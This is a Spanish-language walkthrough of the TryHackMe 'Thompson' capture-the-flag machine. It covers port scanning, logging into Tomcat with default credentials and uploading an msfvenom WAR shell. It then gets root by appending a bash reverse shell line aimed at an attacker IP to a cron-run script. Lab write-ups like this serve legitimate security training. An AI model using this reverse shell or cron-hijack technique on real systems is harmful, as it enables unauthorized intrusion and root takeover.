This page looks best with JavaScript enabled

TryHackMe - Thompson

 ·  ☕ 2 min read  ·  ✍️ sckull

Thompson es una maquina de TryHackMe originalmente para Bsides Guatemala, aqui encontrarás la solucion para obtener la flag user.txt y root.txt.

Informacion de la Maquina

Titulo Thompson
Info boot2root machine for FIT and bsides guatemala CTF
Puntos 60
Dificultad Facil
Maker stuxnet

MASSCAN & NMAP

Escaneo de puertos udp/tcp y sus servicios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~/trymehack/thompson# masscan -p1-65535,U:1-65535 10.10.3.147 --rate=1000 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-09-03 09:27:46 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.3.147                                   
Discovered open port 22/tcp on 10.10.3.147

# Nmap 7.70 scan initiated Tue Sep  3 05:34:12 2019 as: nmap -sV -sC -p8080,22 -o nmap.scan 10.10.3.147
Nmap scan report for 10.10.3.147
Host is up (0.18s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40🆎b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep  3 05:34:26 2019 -- 1 IP address (1 host up) scanned in 14.01 seconds

HTTP - PUERTO 8080

Pagina en el puerto 8080 nos muestra que esta corriendo thompson.
image

TOMCAT - DEFAULT CREDENTIALS

Utilizamos las credenciales por default y el panel de tomcat para iniciar sesion.

REVERSE SHELL - JSP

Creamos nuestro payload con msfvenom y ponemos a la escucha metasploit.
image

Subimos nuestro archivo shell.war y al abrirlo se ejecutará nuestra shell.

image

Obtenemos nuestra flag user.txt.

image

PRIVILEGE ESCALATION

Utilizamos pspy para ver los cronjobs que se ejecutan. Vemos un archivo que se ejecuta y este se encuentra en /home/jack/id.sh.

image
image

Agregamos una shell inversa al archivo id.sh y esperamos hasta que se ejecute de nuevo.

1
echo "bash -i >& /dev/tcp/10.8.1.72/1338 0>&1" >> script.sh

image

Obtenemos nuestra shell como usuario root y nuestra flag root.txt.
image

Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

THM: Thompson